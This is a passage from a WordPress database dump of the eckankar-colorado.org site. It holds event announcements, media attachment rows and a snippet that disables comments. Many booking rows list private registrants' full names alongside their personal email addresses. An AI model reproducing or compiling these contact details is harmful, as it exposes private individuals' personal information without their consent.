16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266859',0,'mec-books','',0),(266860,1000012,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Lynn Gardner - lynnie626@gmail.com','','publish','closed','closed','','lynn-gardner-lynnie626gmail-com-3','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266860',0,'mec-books','',0),(266861,1000034,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Anna Lafferty - alaffertyhu@gmail.com','','publish','closed','closed','','anna-lafferty-alaffertyhugmail-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266861',0,'mec-books','',0),(266862,0,'2022-07-10 10:20:20','2022-07-10 16:20:20','','','','publish','closed','closed','','266862','','','2022-07-10 10:20:20','2022-07-10 16:20:20','',0,'https://eckankar-colorado.org/nf_sub/266862/',0,'nf_sub','',0),(266863,1000035,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Linda Walker - stuart@olypen.com','','publish','closed','closed','','linda-walker-stuartolypen-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266863',0,'mec-books','',0),(266864,1000036,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266864',0,'mec-books','',0),(266865,1000037,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Patrick Reeves - p_b_reeves@msn.com','','publish','closed','closed','','patrick-reeves-p_b_reevesmsn-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/mec-books/patrick-reeves-p_b_reevesmsn-com/',0,'mec-books','',0),(266866,1000038,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Renee Wholey - renee4eck@hotmail.com','','publish','closed','closed','','renee-wholey-renee4eckhotmail-com','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/mec-books/renee-wholey-renee4eckhotmail-com/',0,'mec-books','',0),(266867,1000001,'2022-07-10 10:30:00','2022-07-10 16:30:00','','Kelly Walker  - kellywinfo@gmail.com','','publish','closed','closed','','kelly-walker-kellywinfogmail-com-2','','','2022-07-10 10:30:00','2022-07-10 16:30:00','',0,'https://eckankar-colorado.org/mec-books/kelly-walker-kellywinfogmail-com-2/',0,'mec-books','',0),(266868,0,'2022-07-14 11:36:11','2022-07-14 17:36:11','','','','publish','closed','closed','','266868','','','2022-07-14 11:36:11','2022-07-14 17:36:11','',0,'https://eckankar-colorado.org/nf_sub/266868/',0,'nf_sub','',0),(266869,0,'2022-07-15 12:53:03','2022-07-15 18:53:03','','','','publish','closed','closed','','266869','','','2022-07-15 12:53:03','2022-07-15 18:53:03','',0,'https://eckankar-colorado.org/nf_sub/266869/',0,'nf_sub','',0),(266871,2,'2022-07-17 12:26:46','2022-07-17 18:26:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n<br>\r\n</span> <!-- REGISTRATION SHORTCODE --></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong> COVID-19 Safety Measures<br>\r\n</strong></span><span style=\"font-size: 12pt;\"><strong>***</strong><em>We are following the current Larimer County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Loveland<br>ECK Light and Sound Service - In Person','','publish','closed','closed','','eck-light-and-sound-service-in-person','','','2022-07-17 13:17:44','2022-07-17 19:17:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266871',0,'mec-events','',0),(266874,2,'2022-07-17 13:17:18','2022-07-17 19:17:18','','eagle-blusky-3','','inherit','closed','closed','','eagle-blusky-3-2','','','2022-07-17 13:17:18','2022-07-17 19:17:18','',266871,'https://eckankar-colorado.org/wp-content/uploads/2022/07/eagle-blusky-3-1.jpg',0,'attachment','image/jpeg',0),(266883,2,'2022-07-18 09:16:12','2022-07-18 15:16:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in. </span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Roundtable Discussion - In Person<br>\'The Journey of Soul\'','','publish','closed','closed','','roundtable-discussion-in-personthe-journey-of-soul','','','2022-07-18 09:17:29','2022-07-18 15:17:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266883',0,'mec-events','',0),(266884,2,'2022-07-18 09:15:23','2022-07-18 15:15:23','','blu-butterfly-1','','inherit','closed','closed','','blu-butterfly-1','','','2022-07-18 09:15:23','2022-07-18 15:15:23','',266883,'https://eckankar-colorado.org/wp-content/uploads/2022/07/blu-butterfly-1.jpg',0,'attachment','image/jpeg',0),(266885,1000036,'2022-07-19 19:00:00','2022-07-20 01:00:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net-2','','','2022-07-19 19:00:00','2022-07-20 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266885',0,'mec-books','',0),(266886,1000036,'2022-08-16 19:00:00','2022-08-17 01:00:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net-3','','','2022-08-16 19:00:00','2022-08-17 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266886',0,'mec-books','',0),(266887,1000036,'2022-08-21 11:45:00','2022-08-21 17:45:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net-4','','','2022-08-21 11:45:00','2022-08-21 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266887',0,'mec-books','',0),(266888,2,'2022-07-19 10:00:27','2022-07-19 16:00:27','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Would you like to learn more about ECKANKAR?<br>\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Would you like to attend a fun spiritual event?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will be hosting an ECKANKAR booth at the Durango Whole Expo on the weekend after Labor Day. We invite you to join us!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><strong>Dates:</strong> Saturday, September 10th and Sunday, September 11th, 2021</span><br>\r\n<span style=\"font-size: 14pt;\"><strong>Time:</strong> Saturday 10 am to 5 pm; Sunday 10 am to 5 pm</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will be offering a free discussion open to the public on the topic of “<em>Opening Your Heart to Love</em>” on Saturday at 3pm. Additionally, we will be giving out ‘<em>ECK Wisdom</em>‘ books to interested people and our booth will have a ‘Wisdom Wheel’ that people can spin for a playful way to receive spiritual insights.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The Whole Expo brings together participants with conscious, holistic and ecological perspectives. The event features 90 booths and presents many speakers. Cost: $5.00 to both days and includes all exhibits, seminars/workshops and patio events. Free for children 12 and under.</span></p>\r\n<p class=\"\" style=\"font-weight: 600;\" data-font-weight=\"600\"><span style=\"font-size: 14pt;\">Find us at LaPlata County Fairgrounds, Main Exhibit Hall - Booth #A 3-5</span></p>\r\n<p class=\"\" style=\"padding: 10px 0px 10px 40px; width: 40%; background-color: #fef9f0; border: 1px solid #eaeaea;\"><strong><span style=\"font-size: 16pt; color: #009500;\">Event dates:</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Saturday, September 10</span></strong><br>\r\n<span style=\"font-size: 14pt;\">10:00 a.m. - 5:00 p.m.<br>\r\n<strong>Sunday, September 11</strong><br>\r\n10:00 a.m. - 5:00 p.m.<br>\r\n<br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can visit the <a href=\"https://www.wholeexpo.com/index.php\" target=\"_blank\" rel=\"noopener\">WholeExpo</a> website for more information about the Expo.<br>\r\n<br>\r\n</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Join us for these in person discussions in Durango at the Rocky Mtn Retreat Center 848 E. 3rd Ave -- held after the Expo:</span></strong></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>Life After Death – Sunday, September 18, 4 pm</strong></span><br>\r\n<span style=\"font-size: 14pt;\">Do you wonder what\'s next when our physical body dies?</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>Spiritual Dreaming – Sunday, October 2, 4pm</strong></span><br>\r\n<span style=\"font-size: 14pt;\">Dreams can help you receive guidance.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>Conquering Fear – Sunday, October 16, 4 pm</strong></span><br>\r\n<span style=\"font-size: 14pt;\">Explore Conquering Fear from a higher perspective</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>Relationships – Sunday, November 6, 4 pm</strong></span><br>\r\n<span style=\"font-size: 14pt;\">Discover the Secret of all Relationships</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>Inner Guidance – Sunday, November 20, 4 pm</strong></span><br>\r\n<span style=\"font-size: 14pt;\">How do you recognize and act on your inner guidance?</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><strong>Soul Travel - Sunday, December 4, 4 pm</strong></span><br>\r\n<span style=\"font-size: 14pt;\">What is it and how do you do it?­</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Durango<br>ECKANKAR Booth at WholeExpo','','publish','closed','closed','','durangoeckankar-booth-at-wholeexpo','','','2022-08-26 11:01:30','2022-08-26 17:01:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266888',0,'mec-events','',0),(266889,2,'2022-07-19 09:57:59','2022-07-19 15:57:59','','2022-ECK-durango-whole-expo-1','','inherit','closed','closed','','2022-eck-durango-whole-expo-1','','','2022-07-19 09:57:59','2022-07-19 15:57:59','',266888,'https://eckankar-colorado.org/wp-content/uploads/2022/07/2022-ECK-durango-whole-expo-1.jpg',0,'attachment','image/jpeg',0),(266905,2,'2022-07-26 12:10:19','0000-00-00 00:00:00','<div class=\"tmpl-call_to_action-1 boldgrid-section dynamic-gridblock background-scroll\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 10px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2022/07/bkgrnd-only-5.png\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2022/07/bkgrnd-only-5.png\">\r\n<div class=\"col-md-5 col-sm-8 col-xs-12 col-lg-6\" data-bg-color-1=\"\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to left\" style=\"padding: 0px 15px;\">\r\n<div class=\"color1-text-contrast bg-box-cover \" style=\"padding: 7px 15%;\">\r\n<h2 class=\"h1 color1-color\" style=\"margin-top: 0px; font-family: \'Raleway\'; text-transform: none; font-size: 39px;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">ECK Soul Adventure <span style=\"font-weight: bold;\">eBooklets</span></h2>\r\n<p class=\"color1-color\" style=\"font-size: 17px;\">Each dynamic eBooklet in this series offers a quick tour of a key facet of spiritual living.</p>\r\n<p class=\"color1-color\" style=\"font-size: 17px;\">These short mobile-friendly PDFs cover a wide range of spiritual interests and needs. A delight to the eye and uplifting to every heart.</p>\r\n<p class=\"\"><img class=\"alignleft wp-image-266908 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/07/booklets-devices-3.png\" alt=\"\" width=\"415\" height=\"153\"></p>\r\n<p class=\"\" style=\"margin-bottom: 15px; padding: 0px;\"><a class=\"btn-color-1 btn btn-uppercase btn-rounded btn-raised\" style=\"text-transform: none; font-size: 17px;\" href=\"https://www.eckankar.org/ebooklets/\" target=\"_blank\" rel=\"noopener\" data-font-style=\"\">View &amp; Download Free eBooklets</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-7 col-sm-4 col-xs-12 col-lg-6\">\r\n<p class=\"mod-reset\" style=\"margin-top: 20px;\"><img class=\"alignleft wp-image-266835 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/07/booklets-only-2.png\" alt=\"\" width=\"620\" height=\"503\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ESC eBooklets Promo- Final','','draft','closed','closed','','','','','2022-07-26 12:10:19','2022-07-26 18:10:19','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=266905',0,'bg_block','',0),(266906,2,'2022-07-20 15:08:52','2022-07-20 21:08:52','','bkgrnd-only-5','','inherit','closed','closed','','bkgrnd-only-5','','','2022-07-20 15:08:52','2022-07-20 21:08:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/07/bkgrnd-only-5.png',0,'attachment','image/png',0),(266907,2,'2022-07-20 15:09:01','2022-07-20 21:09:01','','booklets-only-2','','inherit','closed','closed','','booklets-only-2','','','2022-07-20 15:09:01','2022-07-20 21:09:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/07/booklets-only-2.png',0,'attachment','image/png',0),(266908,2,'2022-07-20 15:09:08','2022-07-20 21:09:08','','booklets-devices-3','','inherit','closed','closed','','booklets-devices-3','','','2022-07-20 15:09:08','2022-07-20 21:09:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/07/booklets-devices-3.png',0,'attachment','image/png',0),(266909,0,'2022-07-20 15:10:21','2022-07-20 21:10:21','','','','publish','closed','closed','','266909','','','2022-07-20 15:10:21','2022-07-20 21:10:21','',0,'https://eckankar-colorado.org/nf_sub/266909/',0,'nf_sub','',0),(266934,2,'2022-07-24 13:29:35','2022-07-24 19:29:35','','satsang-reg-bk1-sm','','inherit','closed','closed','','satsang-reg-bk1-sm','','','2022-07-24 13:29:35','2022-07-24 19:29:35','',79666,'https://eckankar-colorado.org/wp-content/uploads/2022/07/satsang-reg-bk1-sm.jpg',0,'attachment','image/jpeg',0),(266942,2,'2022-08-14 21:08:33','2022-08-15 03:08:33','<div class=\"boldgrid-section\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2022/09/unsplash-wave-surfer-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://source.unsplash.com/MqJX_8EaStM/1920x1080\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; padding-bottom: 78px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"text-align: center;\">[ninja_form id=58]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Satsang Class Registrations - 2022-2023','','draft','closed','closed','','satsang-class-registrations-2022-2023','','','2023-09-11 00:51:47','2023-09-11 06:51:47','',79666,'https://eckankar-colorado.org/?page_id=266942',0,'page','',0),(266947,0,'2022-07-25 03:08:59','2022-07-25 09:08:59','','','','publish','closed','closed','','266947','','','2022-07-25 03:08:59','2022-07-25 09:08:59','',0,'https://eckankar-colorado.org/nf_sub/266947/',0,'nf_sub','',0),(266948,1000036,'2022-09-20 19:00:00','2022-09-21 01:00:00','','Carolyn Graff - zgraff@charter.net','','publish','closed','closed','','carolyn-graff-zgraffcharter-net-5','','','2022-09-20 19:00:00','2022-09-21 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266948',0,'mec-books','',0),(266951,2,'2022-07-25 21:11:25','2022-07-26 03:11:25','','gratitude-1','','inherit','closed','closed','','gratitude-1','','','2022-07-25 21:11:25','2022-07-26 03:11:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/07/gratitude-1.jpg',0,'attachment','image/jpeg',0),(266976,2,'2022-07-26 12:31:53','0000-00-00 00:00:00','Thank you for reading this post, don\'t forget to subscribe!','Display a message after the 1st paragraph of posts','','draft','closed','closed','','','','','2022-07-26 12:31:53','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=wpcode&p=266976',0,'wpcode','',0),(266977,2,'2022-07-26 12:31:53','0000-00-00 00:00:00','add_action(\'admin_init\', function () {\r\n    // Redirect any user trying to access comments page\r\n    global $pagenow;\r\n    \r\n    if ($pagenow === \'edit-comments.php\') {\r\n        wp_safe_redirect(admin_url());\r\n        exit;\r\n    }\r\n\r\n    // Remove comments metabox from dashboard\r\n    remove_meta_box(\'dashboard_recent_comments\', \'dashboard\', \'normal\');\r\n\r\n    // Disable support for comments and trackbacks in post types\r\n    foreach (get_post_types() as $post_type) {\r\n        if (post_type_supports($post_type, \'comments\')) {\r\n            remove_post_type_support($post_type, \'comments\');\r\n            remove_post_type_support($post_type, \'trackbacks\');\r\n        }\r\n    }\r\n});\r\n\r\n// Close comments on the front-end\r\nadd_filter(\'comments_open\', \'__return_false\', 20, 2);\r\nadd_filter(\'pings_open\', \'__return_false\', 20, 2);\r\n\r\n// Hide existing comments\r\nadd_filter(\'comments_array\', \'__return_empty_array\', 10, 2);\r\n\r\n// Remove comments page in menu\r\nadd_action(\'admin_menu\', function () {\r\n    remove_menu_page(\'edit-comments.php\');\r\n});\r\n\r\n// Remove comments links from admin bar\r\nadd_action(\'init\', function () {\r\n    if (is_admin_bar_showing()) {\r\n        remove_action(\'admin_bar_menu\', \'wp_admin_bar_comments_menu\', 60);\r\n    }\r\n});','Completely Disable Comments','','draft','closed','closed','','','','','2022-07-26 12:31:53','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=wpcode&p=266977',0,'wpcode','',0),(266978,2,'2022-07-26 12:31:58','0000-00-00 00:00:00','Thank you for reading this post, don\'t forget to subscribe!','Display a message after the 1st paragraph of posts','','draft','closed','closed','','','','','2022-07-26 12:31:58','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=wpcode&p=266978',0,'wpcode','',0),(266979,2,'2022-07-26 12:31:58','0000-00-00 00:00:00','add_action(\'admin_init\', function () {\r\n    // Redirect any user trying to access comments page\r\n    global $pagenow;\r\n    \r\n    if ($pagenow === \'edit-comments.php\') {\r\n        wp_safe_redirect(admin_url());\r\n        exit;\r\n    }\r\n\r\n    // Remove comments metabox from dashboard\r\n    remove_meta_box(\'dashboard_recent_comments\', \'dashboard\', \'normal\');\r\n\r\n    // Disable support for comments and trackbacks in post types\r\n    foreach (get_post_types() as $post_type) {\r\n        if (post_type_supports($post_type, \'comments\')) {\r\n            remove_post_type_support($post_type, \'comments\');\r\n            remove_post_type_support($post_type, \'trackbacks\');\r\n        }\r\n    }\r\n});\r\n\r\n// Close comments on the front-end\r\nadd_filter(\'comments_open\', \'__return_false\', 20, 2);\r\nadd_filter(\'pings_open\', \'__return_false\', 20, 2);\r\n\r\n// Hide existing comments\r\nadd_filter(\'comments_array\', \'__return_empty_array\', 10, 2);\r\n\r\n// Remove comments page in menu\r\nadd_action(\'admin_menu\', function () {\r\n    remove_menu_page(\'edit-comments.php\');\r\n});\r\n\r\n// Remove comments links from admin bar\r\nadd_action(\'init\', function () {\r\n    if (is_admin_bar_showing()) {\r\n        remove_action(\'admin_bar_menu\', \'wp_admin_bar_comments_menu\', 60);\r\n    }\r\n});','Completely Disable Comments','','draft','closed','closed','','','','','2022-07-26 12:31:58','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=wpcode&p=266979',0,'wpcode','',0),(266980,2,'2022-07-26 12:32:00','0000-00-00 00:00:00','Thank you for reading this post, don\'t forget to subscribe!','Display a message after the 1st paragraph of posts','','draft','closed','closed','','','','','2022-07-26 12:32:00','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=wpcode&p=266980',0,'wpcode','',0),(266981,2,'2022-07-26 12:32:00','0000-00-00 00:00:00','add_action(\'admin_init\', function () {\r\n    // Redirect any user trying to access comments page\r\n    global $pagenow;\r\n    \r\n    if ($pagenow === \'edit-comments.php\') {\r\n        wp_safe_redirect(admin_url());\r\n        exit;\r\n    }\r\n\r\n    // Remove comments metabox from dashboard\r\n    remove_meta_box(\'dashboard_recent_comments\', \'dashboard\', \'normal\');\r\n\r\n    // Disable support for comments and trackbacks in post types\r\n    foreach (get_post_types() as $post_type) {\r\n        if (post_type_supports($post_type, \'comments\')) {\r\n            remove_post_type_support($post_type, \'comments\');\r\n            remove_post_type_support($post_type, \'trackbacks\');\r\n        }\r\n    }\r\n});\r\n\r\n// Close comments on the front-end\r\nadd_filter(\'comments_open\', \'__return_false\', 20, 2);\r\nadd_filter(\'pings_open\', \'__return_false\', 20, 2);\r\n\r\n// Hide existing comments\r\nadd_filter(\'comments_array\', \'__return_empty_array\', 10, 2);\r\n\r\n// Remove comments page in menu\r\nadd_action(\'admin_menu\', function () {\r\n    remove_menu_page(\'edit-comments.php\');\r\n});\r\n\r\n// Remove comments links from admin bar\r\nadd_action(\'init\', function () {\r\n    if (is_admin_bar_showing()) {\r\n        remove_action(\'admin_bar_menu\', \'wp_admin_bar_comments_menu\', 60);\r\n    }\r\n});','Completely Disable Comments','','draft','closed','closed','','','','','2022-07-26 12:32:00','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=wpcode&p=266981',0,'wpcode','',0),(266983,15,'2022-07-27 07:22:43','2022-07-27 13:22:43','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Have you had a spiritual experience?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Would you like to understand more about it?</span></p>\r\n<p><span style=\"font-size: 14pt;\">Could it be that your experience was trying to tell you something about yourself?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">These types of experiences are gifts and the personal insights you gain from them can enrich your daily life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Thirty-three percent of people polled say they have had a spiritual experience. Topics for discussion include various types of these spiritual experiences such as coincidences and amazing connections, miracles of protection and guidance, past life recall, dreams, out-of-body experiences and more.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You’ll have the opportunity to try a spiritual exercise to enhance you spiritual journey! In addition, we’ll offer other tools to help you gain a better understanding of your experiences and how the Divine works in our lives.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Please join us on August 14th at 1:00 p.m. at the Pagosa Lakes Club House. The address is 230 A Port Avenue, Pagosa Springs. </span><span style=\"font-size: 14pt;\">This free discussion is sponsored by ECKANKAR, the Path of Spiritual Freedom.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Follow us on <a href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166\" target=\"_blank\" rel=\"noopener\">Facebook</a></span><br>\r\n<br>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><strong>** <em>We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></strong></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/287392410/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - In Person<br>Have You Had a Spiritual Experience?','','publish','closed','closed','','meetup-in-personhave-you-had-a-spiritual-experience','','','2022-07-27 07:22:43','2022-07-27 13:22:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266983',0,'mec-events','',0),(266984,15,'2022-07-27 07:10:42','2022-07-27 13:10:42','','Gateway','','inherit','closed','closed','','gateway','','','2022-07-27 07:10:42','2022-07-27 13:10:42','',266983,'https://eckankar-colorado.org/wp-content/uploads/2022/07/Gateway.webp',0,'attachment','image/webp',0),(266986,1000015,'2022-08-16 19:00:00','2022-08-17 01:00:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-6','','','2022-08-16 19:00:00','2022-08-17 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266986',0,'mec-books','',0),(266987,1000015,'2022-08-21 11:45:00','2022-08-21 17:45:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-7','','','2022-08-21 11:45:00','2022-08-21 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266987',0,'mec-books','',0),(266988,15,'2022-07-28 17:04:08','2022-07-28 23:04:08','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: disc;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, followed by discussion groups, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU by clicking <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" 